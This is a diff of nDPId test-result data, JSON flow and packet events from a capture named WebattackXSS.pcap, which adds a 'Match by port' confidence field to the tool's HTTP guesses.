 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AVBAAD4GxICsEAABwKgKMtI0AFAiVX1VAAAAAKACchBvlgAAAgQFtAQCCAoBOXwFAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347119336,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0jRzeBsiIlV9VqAScSCQfAAAAgQFtAQCCAoD4017ATl8BQEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":1499347119336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347119336,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AVFAAD4GxIesEAABwKgKMtI0AFAiVX1Wc3gbI4AQAOUvhAAAAQEICgE5fAUD4017"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120352,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347120603,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347120603,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1294,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1499347120603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347120603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA815JAAD4G7j2sEAABwKgKMtJCAFDFAarTAAAAAKACchCeIQAAAgQFtAQCCAoBOX1BAAAAAAEDAwc="}
@@ -434,15 +434,15 @@
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347129584,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rtVAAD4GFvusEAABwKgKMtKgAFDfKCjSAAAAAKACchD81wAAAgQFtAQCCAoBOYYHAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347129584,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0qA\/BA1B3ygo06AScSBWEQAAAgQFtAQCCAoD41d9ATmGBwEDAwc="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1499347129585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347129585,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rtZAAD4GFwKsEAABwKgKMtKgAFDfKCjTPwQNQoAQAOX1GAAAAQEICgE5hgcD41d9"}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347007496,"flow_last_seen":1499347012613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347010080,"flow_last_seen":1499347015613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52668,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347011349,"flow_last_seen":1499347016613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52682,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347012617,"flow_last_seen":1499347018613,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347130596,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52696,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347132137,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347132137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347132137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pedAAD4GH+msEAABwKgKMtK6AFAZEC1iAAAAAKACchC7yAAAAgQFtAQCCAoBOYiFAAAAAAEDAwc="}
@@ -464,17 +464,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347138552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8erdAAD4GSxmsEAABwKgKMtL+AFByz\/R+AAAAAKACchCUZAAAAgQFtAQCCAoBOY7JAAAAAAEDAwc="}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347138552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0v61vhLmcs\/0f6AScSBofAAAAgQFtAQCCAoD42A\/ATmOyQEDAwc="}
